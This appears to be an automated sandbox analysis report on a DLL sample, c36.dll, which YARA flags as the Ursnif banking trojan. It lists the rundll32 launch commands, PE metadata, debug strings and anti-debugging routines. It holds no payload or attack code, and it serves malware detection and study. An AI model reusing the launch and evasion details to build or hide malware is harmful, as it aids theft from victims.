            Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\c36.dll,Beautyresult
            Source: unknown | Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe 'C:\Users\user\Desktop\c36.dll'
            Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\c36.dll',#1
            Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\c36.dll,Beautyresult
            Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\c36.dll',#1
            Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\c36.dll,Division
            Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\c36.dll,Fastcolor
            Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\c36.dll,Yetclose
            Source: unknown | Process created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
            Source: C:\Program Files\internet explorer\iexplore.exe | Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5468 CREDAT:17410 /prefetch:2
            Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1632 -s 852
            Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\c36.dll',#1
            Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\c36.dll,Beautyresult
            Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\c36.dll,Division
            Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\c36.dll,Fastcolor
            Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\c36.dll,Yetclose
            Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\c36.dll',#1
            Source: C:\Program Files\internet explorer\iexplore.exe | Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5468 CREDAT:17410 /prefetch:2
            Source: C:\Windows\System32\loaddll32.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32
            Source: C:\Windows\SysWOW64\rundll32.exe | Automated click: OK
            Source: C:\Windows\SysWOW64\rundll32.exe | Automated click: OK
            Source: C:\Windows\SysWOW64\rundll32.exe | Automated click: OK
            Source: C:\Windows\SysWOW64\rundll32.exe | Automated click: OK
            Source: Window Recorder | Window detected: More than 3 window changes detected
            Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe | File opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll
            Source: c36.dll | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
            Source: c36.dll | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
            Source: c36.dll | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
            Source: c36.dll | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: c36.dll | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
            Source: c36.dll | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
            Source: c36.dll | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Binary string: WinTypes.pdb source: WerFault.exe, 0000001A.00000003.409583861.00000000056F8000.00000004.00000040.sdmp
            Source: Binary string: wkernel32.pdb source: WerFault.exe, 0000001A.00000003.409544417.00000000055C1000.00000004.00000001.sdmp
            Source: Binary string: sfc_os.pdb source: WerFault.exe, 0000001A.00000003.409583861.00000000056F8000.00000004.00000040.sdmp
            Source: Binary string: bcrypt.pdb source: WerFault.exe, 0000001A.00000003.409583861.00000000056F8000.00000004.00000040.sdmp
            Source: Binary string: ucrtbase.pdb source: WerFault.exe, 0000001A.00000003.409570664.00000000056F2000.00000004.00000040.sdmp
            Source: Binary string: CoreMessaging.pdb_ source: WerFault.exe, 0000001A.00000003.409603470.0000000005704000.00000004.00000040.sdmp
            Source: Binary string: msvcrt.pdb source: WerFault.exe, 0000001A.00000003.409544417.00000000055C1000.00000004.00000001.sdmp
            Source: Binary string: wrpcrt4.pdb source: WerFault.exe, 0000001A.00000003.409645470.00000000056F0000.00000004.00000040.sdmp
            Source: Binary string: wntdll.pdb source: WerFault.exe, 0000001A.00000003.401542814.0000000003492000.00000004.00000001.sdmp
            Source: Binary string: CoreMessaging.pdb source: WerFault.exe, 0000001A.00000003.409603470.0000000005704000.00000004.00000040.sdmp
            Source: Binary string: ntmarta.pdby1Zs# source: WerFault.exe, 0000001A.00000003.409583861.00000000056F8000.00000004.00000040.sdmp
            Source: Binary string: shcore.pdb source: WerFault.exe, 0000001A.00000003.409570664.00000000056F2000.00000004.00000040.sdmp
            Source: Binary string: wgdi32.pdb source: WerFault.exe, 0000001A.00000003.409544417.00000000055C1000.00000004.00000001.sdmp
            Source: Binary string: fltLib.pdb source: WerFault.exe, 0000001A.00000003.409583861.00000000056F8000.00000004.00000040.sdmp
            Source: Binary string: advapi32.pdb source: WerFault.exe, 0000001A.00000003.409583861.00000000056F8000.00000004.00000040.sdmp
            Source: Binary string: c:\Door\26\Enter\Mos\Hard \Stretch.pdb source: loaddll32.exe, 00000002.00000002.484014411.000000006E1EB000.00000002.00020000.sdmp, rundll32.exe, 00000005.00000002.487526023.000000006E1EB000.00000002.00020000.sdmp, rundll32.exe, 00000006.00000000.386861374.000000006E1EB000.00000002.00020000.sdmp, c36.dll
            Source: Binary string: wsspicli.pdb source: WerFault.exe, 0000001A.00000003.409583861.00000000056F8000.00000004.00000040.sdmp
            Source: Binary string: shell32.pdb source: WerFault.exe, 0000001A.00000003.409570664.00000000056F2000.00000004.00000040.sdmp
            Source: Binary string: msvcp_win.pdbk source: WerFault.exe, 0000001A.00000003.409570664.00000000056F2000.00000004.00000040.sdmp
            Source: Binary string: ntmarta.pdb source: WerFault.exe, 0000001A.00000003.409583861.00000000056F8000.00000004.00000040.sdmp
            Source: Binary string: msvcp_win.pdb source: WerFault.exe, 0000001A.00000003.409570664.00000000056F2000.00000004.00000040.sdmp
            Source: Binary string: wkernelbase.pdb source: WerFault.exe, 0000001A.00000003.409544417.00000000055C1000.00000004.00000001.sdmp
            Source: Binary string: wimm32.pdb source: WerFault.exe, 0000001A.00000003.409583861.00000000056F8000.00000004.00000040.sdmp
            Source: Binary string: mpr.pdb source: WerFault.exe, 0000001A.00000003.409645470.00000000056F0000.00000004.00000040.sdmp
            Source: Binary string: CoreUIComponents.pdb source: WerFault.exe, 0000001A.00000003.409603470.0000000005704000.00000004.00000040.sdmp
            Source: Binary string: shlwapi.pdb source: WerFault.exe, 0000001A.00000003.409583861.00000000056F8000.00000004.00000040.sdmp
            Source: Binary string: wwin32u.pdb source: WerFault.exe, 0000001A.00000003.409544417.00000000055C1000.00000004.00000001.sdmp
            Source: Binary string: setupapi.pdb source: WerFault.exe, 0000001A.00000003.409583861.00000000056F8000.00000004.00000040.sdmp
            Source: Binary string: cryptbase.pdbT? source: WerFault.exe, 0000001A.00000003.409583861.00000000056F8000.00000004.00000040.sdmp
            Source: Binary string: wUxTheme.pdb source: WerFault.exe, 0000001A.00000003.409583861.00000000056F8000.00000004.00000040.sdmp
            Source: Binary string: imagehlp.pdb source: WerFault.exe, 0000001A.00000003.409583861.00000000056F8000.00000004.00000040.sdmp
            Source: Binary string: dwmapi.pdb source: WerFault.exe, 0000001A.00000003.409583861.00000000056F8000.00000004.00000040.sdmp
            Source: Binary string: wntdll.pdb( source: WerFault.exe, 0000001A.00000003.401542814.0000000003492000.00000004.00000001.sdmp
            Source: Binary string: shcore.pdbk source: WerFault.exe, 0000001A.00000003.409570664.00000000056F2000.00000004.00000040.sdmp
            Source: Binary string: profapi.pdb source: WerFault.exe, 0000001A.00000003.409583861.00000000056F8000.00000004.00000040.sdmp
            Source: Binary string: winspool.pdb source: WerFault.exe, 0000001A.00000003.409583861.00000000056F8000.00000004.00000040.sdmp
            Source: Binary string: wgdi32full.pdb source: WerFault.exe, 0000001A.00000003.409544417.00000000055C1000.00000004.00000001.sdmp
            Source: Binary string: shell32.pdbk source: WerFault.exe, 0000001A.00000003.409570664.00000000056F2000.00000004.00000040.sdmp
            Source: Binary string: sechost.pdb source: WerFault.exe, 0000001A.00000003.409583861.00000000056F8000.00000004.00000040.sdmp
            Source: Binary string: iphlpapi.pdb source: WerFault.exe, 0000001A.00000003.409583861.00000000056F8000.00000004.00000040.sdmp
            Source: Binary string: propsys.pdb source: WerFault.exe, 0000001A.00000003.409583861.00000000056F8000.00000004.00000040.sdmp
            Source: Binary string: cfgmgr32.pdbk source: WerFault.exe, 0000001A.00000003.409570664.00000000056F2000.00000004.00000040.sdmp
            Source: Binary string: ucrtbase.pdbk source: WerFault.exe, 0000001A.00000003.409570664.00000000056F2000.00000004.00000040.sdmp
            Source: Binary string: powrprof.pdb source: WerFault.exe, 0000001A.00000003.409583861.00000000056F8000.00000004.00000040.sdmp
            Source: Binary string: msctf.pdb source: WerFault.exe, 0000001A.00000003.409583861.00000000056F8000.00000004.00000040.sdmp
            Source: Binary string: ole32.pdb source: WerFault.exe, 0000001A.00000003.409583861.00000000056F8000.00000004.00000040.sdmp
            Source: Binary string: TextInputFramework.pdb source: WerFault.exe, 0000001A.00000003.409583861.00000000056F8000.00000004.00000040.sdmp
            Source: Binary string: AcLayers.pdb source: WerFault.exe, 0000001A.00000003.409544417.00000000055C1000.00000004.00000001.sdmp
            Source: Binary string: Kernel.Appcore.pdb source: WerFault.exe, 0000001A.00000003.409645470.00000000056F0000.00000004.00000040.sdmp
            Source: Binary string: msctf.pdbG1xs( source: WerFault.exe, 0000001A.00000003.409583861.00000000056F8000.00000004.00000040.sdmp
            Source: Binary string: cryptbase.pdb source: WerFault.exe, 0000001A.00000003.409583861.00000000056F8000.00000004.00000040.sdmp
            Source: Binary string: bcryptprimitives.pdb source: WerFault.exe, 0000001A.00000003.409645470.00000000056F0000.00000004.00000040.sdmp
            Source: Binary string: cfgmgr32.pdb source: WerFault.exe, 0000001A.00000003.409570664.00000000056F2000.00000004.00000040.sdmp
            Source: Binary string: Windows.Storage.pdb source: WerFault.exe, 0000001A.00000003.409645470.00000000056F0000.00000004.00000040.sdmp
            Source: Binary string: combase.pdb source: WerFault.exe, 0000001A.00000003.409583861.00000000056F8000.00000004.00000040.sdmp
            Source: Binary string: WinTypes.pdbK1dsg& source: WerFault.exe, 0000001A.00000003.409583861.00000000056F8000.00000004.00000040.sdmp
            Source: Binary string: rundll32.pdb source: WerFault.exe, 0000001A.00000003.409544417.00000000055C1000.00000004.00000001.sdmp
            Source: Binary string: oleaut32.pdb source: WerFault.exe, 0000001A.00000003.409583861.00000000056F8000.00000004.00000040.sdmp
            Source: Binary string: sfc.pdb source: WerFault.exe, 0000001A.00000003.409583861.00000000056F8000.00000004.00000040.sdmp
            Source: Binary string: apphelp.pdb source: WerFault.exe, 0000001A.00000003.409544417.00000000055C1000.00000004.00000001.sdmp
            Source: Binary string: wuser32.pdb source: WerFault.exe, 0000001A.00000003.409544417.00000000055C1000.00000004.00000001.sdmp
            Source: Binary string: combase.pdbgB source: WerFault.exe, 0000001A.00000003.409583861.00000000056F8000.00000004.00000040.sdmp
            Source: c36.dll | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
            Source: c36.dll | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
            Source: c36.dll | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
            Source: c36.dll | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
            Source: c36.dll | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
            Source: C:\Windows\System32\loaddll32.exe | Code function: 2_2_6E1A1BAC LoadLibraryA,GetProcAddress,
            Source: C:\Windows\System32\loaddll32.exe | Code function: 2_2_6E1A2120 push ecx; ret
            Source: C:\Windows\System32\loaddll32.exe | Code function: 2_2_6E1A2173 push ecx; ret
            Source: C:\Windows\System32\loaddll32.exe | Code function: 2_2_02EAABC0 push ecx; ret
            Source: C:\Windows\System32\loaddll32.exe | Code function: 2_2_02EAAF6F push ecx; ret
            Source: C:\Windows\System32\loaddll32.exe | Code function: 2_2_6E1B1F3E push ds; ret
            Source: C:\Windows\System32\loaddll32.exe | Code function: 2_2_6E1B27B2 push edi; retf
            Source: C:\Windows\System32\loaddll32.exe | Code function: 2_2_6E1B1511 push es; ret
            Source: C:\Windows\System32\loaddll32.exe | Code function: 2_2_6E1D9D55 push ecx; ret
            Source: C:\Windows\System32\loaddll32.exe | Code function: 2_2_6E1D7255 push ecx; ret
            Source: C:\Windows\System32\loaddll32.exe | Code function: 2_2_6E205803 push dword ptr [edi]; ret
            Source: C:\Windows\System32\loaddll32.exe | Code function: 2_2_6E2060AF push 5DC4E471h; iretd
            Source: C:\Windows\System32\loaddll32.exe | Code function: 2_2_6E2058DE push ebx; retf
            Source: C:\Windows\System32\loaddll32.exe | Code function: 2_2_6E203501 push eax; ret
            Source: C:\Windows\System32\loaddll32.exe | Code function: 2_2_6E203580 push eax; ret
            Source: C:\Windows\System32\loaddll32.exe | Code function: 2_2_6E20678B push dword ptr [ebx+ecx+36B6D5EAh]; iretd
            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 5_2_0118AF6F push ecx; ret
            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 5_2_0118ABC0 push ecx; ret
            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 5_2_6E1B670E pushad ; retf
            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 5_2_6E1B1F3E push ds; ret
            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 5_2_6E1B5779 push esp; iretd
            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 5_2_6E1B27B2 push edi; retf
            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 5_2_6E1B1511 push es; ret
            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 5_2_6E1D9D55 push ecx; ret
            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 5_2_6E1D7255 push ecx; ret
            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 5_2_6E1B59A9 push esp; ret
            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 5_2_6E205803 push dword ptr [edi]; ret
            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 5_2_6E2060AF push 5DC4E471h; iretd
            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 5_2_6E2058DE push ebx; retf
            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 5_2_6E203501 push eax; ret
            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 5_2_6E203580 push eax; ret
            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 5_2_6E20678B push dword ptr [ebx+ecx+36B6D5EAh]; iretd

            Hooking and other Techniques for Hiding and Protection:

            Yara detected Ursnif
            Source: Yara match | File source: 00000002.00000002.480154797.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000005.00000003.437029493.0000000005A38000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000005.00000003.437142340.0000000005A38000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000005.00000003.436946677.0000000005A38000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000002.00000003.391097194.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000002.00000003.391161462.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000002.00000003.390899688.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000002.00000003.391143928.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000005.00000002.482068718.0000000005A38000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000002.00000003.390847636.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000005.00000003.437405999.0000000005A38000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000005.00000003.437098624.0000000005A38000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000002.00000003.390939253.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000005.00000003.437339959.0000000005A38000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000002.00000003.390979627.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000005.00000003.436834249.0000000005A38000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000002.00000003.391054400.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000005.00000003.437249428.0000000005A38000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: Process Memory Space: loaddll32.exe PID: 4796, type: MEMORY
            Source: Yara match | File source: Process Memory Space: rundll32.exe PID: 1844, type: MEMORY
            Source: C:\Windows\System32\loaddll32.exe | Registry key monitored for changes: HKEY_CURRENT_USER_Classes
            Source: C:\Windows\System32\loaddll32.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\rundll32.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\loaddll32.exe | Last function: Thread delayed
            Source: WerFault.exe, 0000001A.00000002.428359601.0000000005330000.00000002.00000001.sdmp | Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
            Source: WerFault.exe, 0000001A.00000003.425099600.000000000523C000.00000004.00000001.sdmp | Binary or memory string: Hyper-V RAW
            Source: WerFault.exe, 0000001A.00000002.428359601.0000000005330000.00000002.00000001.sdmp | Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
            Source: WerFault.exe, 0000001A.00000002.428359601.0000000005330000.00000002.00000001.sdmp | Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
            Source: WerFault.exe, 0000001A.00000002.428303510.000000000530D000.00000004.00000001.sdmp | Binary or memory string: Hyper-V RAW@
            Source: WerFault.exe, 0000001A.00000002.428359601.0000000005330000.00000002.00000001.sdmp | Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
            Source: C:\Windows\System32\loaddll32.exe | Code function: 2_2_6E1D4FB4 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
            Source: C:\Windows\System32\loaddll32.exe | Code function: 2_2_6E1A1BAC LoadLibraryA,GetProcAddress,
            Source: C:\Windows\System32\loaddll32.exe | Code function: 2_2_6E20434D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\System32\loaddll32.exe | Code function: 2_2_6E20427C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\System32\loaddll32.exe | Code function: 2_2_6E203E83 push dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 5_2_6E20434D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 5_2_6E20427C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 5_2_6E203E83 push dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 6_2_6E20434D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 6_2_6E20427C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 6_2_6E203E83 push dword ptr fs:[00000030h]
            Source: C:\Windows\System32\loaddll32.exe | Code function: 2_2_6E1D6ED0 __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
            Source: C:\Windows\System32\loaddll32.exe | Code function: 2_2_6E1D4FB4 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
            Source: C:\Windows\System32\loaddll32.exe | Code function: 2_2_6E1D27C8 _abort,__NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
            Source: C:\Windows\System32\loaddll32.exe | Code function: 2_2_6E1D6A1F _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 5_2_6E1D6ED0 __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 5_2_6E1D4FB4 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 5_2_6E1D27C8 _abort,__NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 5_2_6E1D6A1F _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 6_2_6E1D6ED0 __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 6_2_6E1D4FB4 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 6_2_6E1D27C8 _abort,__NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 6_2_6E1D6A1F _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
            Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\c36.dll',#1
            Source: loaddll32.exe, 00000002.00000002.479086717.0000000001900000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.481181205.0000000003A60000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000000.374670738.00000000031D0000.00000002.00000001.sdmp | Binary or memory string: Program Manager
            Source: loaddll32.exe, 00000002.00000002.479086717.0000000001900000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.481181205.0000000003A60000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000000.374670738.00000000031D0000.00000002.00000001.sdmp | Binary or memory string: Shell_TrayWnd
            Source: loaddll32.exe, 00000002.00000002.479086717.0000000001900000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.481181205.0000000003A60000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000000.374670738.00000000031D0000.00000002.00000001.sdmp | Binary or memory string: Progman
            Source: loaddll32.exe, 00000002.00000002.479086717.0000000001900000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.481181205.0000000003A60000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000000.374670738.00000000031D0000.00000002.00000001.sdmp | Binary or memory string: Progmanlock
            Source: C:\Windows\System32\loaddll32.exe | Code function: 2_2_02EA9135 cpuid
            Source: C:\Windows\System32\loaddll32.exe | Code function: __calloc_crt,__malloc_crt,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,
            Source: C:\Windows\System32\loaddll32.exe | Code function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,InterlockedDecrement,InterlockedDecrement,
            Source: C:\Windows\System32\loaddll32.exe | Code function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,__invoke_watson,___crtGetLocaleInfoW,
            Source: C:\Windows\System32\loaddll32.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,
            Source: C:\Windows\System32\loaddll32.exe | Code function: GetLocaleInfoA,
            Source: C:\Windows\System32\loaddll32.exe | Code function: GetLocaleInfoA,GetLocaleInfoA,GetACP,
            Source: C:\Windows\System32\loaddll32.exe | Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,
            Source: C:\Windows\System32\loaddll32.exe | Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,
            Source: C:\Windows\System32\loaddll32.exe | Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,
            Source: C:\Windows\System32\loaddll32.exe | Code function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,
            Source: C:\Windows\System32\loaddll32.exe | Code function: _LocaleUpdate::_LocaleUpdate,GetLocaleInfoW,
            Source: C:\Windows\System32\loaddll32.exe | Code function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,
            Source: C:\Windows\System32\loaddll32.exe | Code function: GetLastError,_malloc,WideCharToMultiByte,__freea,GetLocaleInfoA,
            Source: C:\Windows\System32\loaddll32.exe | Code function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,_ProcessCodePage,IsValidCodePage,IsValidLocale,_strcpy_s,__invoke_watson,__itoa_s,
            Source: C:\Windows\System32\loaddll32.exe | Code function: GetLocaleInfoA,_LcidFromHexString,_GetPrimaryLen,_strlen,
            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: __calloc_crt,__malloc_crt,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,
            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,InterlockedDecrement,InterlockedDecrement,
            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,__invoke_watson,___crtGetLocaleInfoW,
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoA,
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoA,GetLocaleInfoA,GetACP,
